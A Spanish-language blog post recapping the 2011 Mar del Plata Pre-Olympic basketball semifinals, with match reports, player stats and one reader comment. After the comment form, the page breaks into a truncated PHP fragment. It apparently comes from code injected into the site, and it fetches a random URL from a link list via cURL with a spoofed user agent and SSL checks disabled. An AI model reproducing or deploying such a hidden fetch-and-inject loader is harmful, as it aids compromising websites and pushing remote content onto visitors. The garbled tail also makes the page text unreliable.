Preolímpico de Mar del Plata: Emoción en estado puro

11 de September de 2011 por German

Todo resuelto en América tras una jornada cargada de emoción y dramatismo. Los dos mejores equipos del torneo sacaron pasaje y definirán mañana el título solo por el honor.

Argentina 81 – 79 Puerto Rico: Dramático, emotivo, vibrante choque en un estadio repleto y con un público muy ruidoso que levantó a los locales en su peor momento del partido y del torneo. Los dos pusieron todo, incluso a Nocioni y Santiago, claramente disminuídos físicamente por lesiones. Comenzó bien Argentina con un Scola imparable (12 puntos, 6/6 TC en el primer cuarto) sacando hasta 10 puntos de ventaja, pero sobre el final de ese período Barea (su mejor partido en el torneo) y Arroyo le dieron vida a su equipo, incluyendo una daga de 10 metros de JJ sobre la chicharra. El segundo cuarto fue todo de los boricuas, con sus dos bases comandando las acciones, y con un excelente juego interno (genial Balkman) duplicando en rebotes a su rival. Solo los triples mantuvieron en partido a los argentinos que se fueron al descanso abajo por cuatro (40-44). La segunda mitad fue una continuación de lo que venía sucediendo y los visitantes sacaron su máxima ventaja (40-48). En ese momento se produjo un momento de quiebre con una jugada de tres puntos de Kammerichs (gran partido) que enardeció a la afición. Comenzó a defender muy duro Argentina y con tres triples seguidos de Manu Ginóbili (uno de ellos a la carrera y doble marcado) dieron vuelta el marcador. El último periodo empezó con dominio argentino, sacando 11 puntos pero la garra de Balkman peleando cada rebote, el amor propio de Santiago lesionado y el talento de Barea sumado a la pésima noche de Delfino (que redondea un torneo desastroso) con 2 pérdidas y varios lanzamientos fallados en ese cuarto, empataron el partido a 79. Se definió en el ultimo minuto con un libre de Ginóbili (falló uno, tenía 96% en el torneo hasta ahí, los nervios le tocan a todos…) y otro de Prigioni en una jugada donde Puerto Rico demoró mucho en dar la falta. Sobre la chicharra un lanzamiento de tres puntos de Barea desde lejos y bastante marcado paralizó el corazón de las 8500 personas que estaban en el estadio que explotaron en un grito cuando pegó en el aro y se fue para cualquier lado.

Con mucho sufrimiento Argentina saca su pasaje para Londres.

Destacados:
Luis Scola (27 pts, 3 As, 12/17 TC)
Manu Ginóbili (23 pts, 7 As, 6/9 triples)
Jose Juan Barea (20 Pts, 4 Reb, 3 As, 2 Rob)
Renaldo Balkman (10 Pts, 12 Reb, 3 Rob, 2 Tap)

Brasil 83 – 76 República Dominicana: Tras una primera fase con dudas, Brasil mejoró notablemente su nivel en la segunda y ayer dominó las acciones de punta a punta basándose en una gran noche de Marcelinho que con sus triples alejaba a su equipo en el marcador cuando su rival intentaba acercarse. Los dominicanos complicaron mucho con los internos de la mano de Horford (algo apagado en la primera mitad) y principalmente de un Martínez colosal que obligaron a Splitter, Rafael y Guillherme a cargarse de faltas (estos dos últimos llegaron a la quinta sobre el final). De no haber sido por errores infantiles, los dominicanos podrían haber logrado algo más. Perdieron bolas increíbles, dejaron sueltos a los internos brasileños bajo el aro más de una vez y la remataron al final tardando 20 segundos en dar una falta… Charlie Villanueva coronó un torneo flojísimo, ayer sólo vio 13 minutos de acción. De cualquier manera, merecida clasificación para Brasil que vuelve a los Juegos Olímpicos después de 16 años, conducidos por el argentino Rubén Magnano (medalla de oro en Atenas 2004) y sin tres de sus NBA: Anderson Varejao, Leandro Barbosa y Nené Hilario. Sin duda serán un rival que pondrá las cosas muy difíciles a cualquiera.

Destacados:
Marcelinho Machado (20 Pts, 4 As)
Jack Michael Martínez (18 Pts, 15 Reb)

Mañana por el título juegan Argentina-Brasil y por el tercer puesto (ya clasificados a la repesca junto con Venezuela) Puerto Rico-República Dominicana.

Comenta

Un comentario a esta entrada

  1. Esteban dice:
    #1

    ginobili, muerto fisicamente mostro una vez mas porque es el maradona del basquet, scola es genial, pero lo de ginobili esta en otro nivel claramente

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>